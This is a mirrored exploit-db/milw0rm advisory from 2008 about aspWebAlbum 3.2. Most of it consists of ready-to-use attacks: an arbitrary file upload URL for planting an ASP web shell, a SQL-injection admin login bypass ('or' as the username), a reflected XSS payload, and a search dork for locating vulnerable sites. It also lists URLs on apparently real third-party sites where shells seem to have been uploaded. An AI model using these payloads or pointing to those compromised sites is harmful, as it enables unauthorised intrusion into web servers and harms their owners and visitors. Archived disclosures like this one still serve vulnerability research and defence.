exploit-db-mirror/exploits/asp/webapps/6420.txt

#################################################################################################
                                                                                                #
#-#  Discovered by Alemin_Krali                                                                 #
                                                                                                #
#-#  aspWebAlbum 3.2                                                                            #
                                                                                                #
#-#  Script Download "http://www.fullrevolution.com"                                            #
                                                                                                #
#-#  aspWebAlbum 3.2 Single Site License  |  $60.00 : )                                         #
                                                                                                #
#-#  HomePage  al3m.blogspot.com                                                                #
                                                                                                #
#-#  alemin@windowslive.com                                                                     #
                                                                                                #
#-#  Dork ? : album.asp?pic= .jpg cat=                                                          #
                                                                                                #
                                                                                                #
                                                                                                #
            #--#  1-Arbitrary File Upload Exploit [AspWebAlbum All Versions]                    #
                                                                                                #
http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name!                   #
                                                                                                #
and your shell adress:                                                                          #
                                                                                                #
http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp                #
                                                                                                #
                                                                                                #
ex:1                                                                                            #
http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp          #
                                                                                                #
ex:2                                                                                            #
http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/                #
Ablaze rally 9-24-06/pics/klasvayv.asp                                                          #
                                                                                                #
                                                                                                #
           #--#  2-Admin Bypass     [AspWebAlbum 3.2]                                           #
                                                                                                #
                                                                                                #
http://site.com/path/album.asp?action=login                                                     #
                                                                                                #
ASP/MS SQL Server login syntax                                                                  #
                                                                                                #
Username:'or'                                                                                   #
Password:anything                                                                               #
                                                                                                #
                                                                                                #
           #--# 3-Xss Vulnerability  [AspWebAlbum 3.2]                                          #
                                                                                                #
http://site.com/album/album.asp?action=summary&message=<script>alert('xss')</script>&from=login #
                                                                                                #
##################################################################################################

# milw0rm.com [2008-09-10]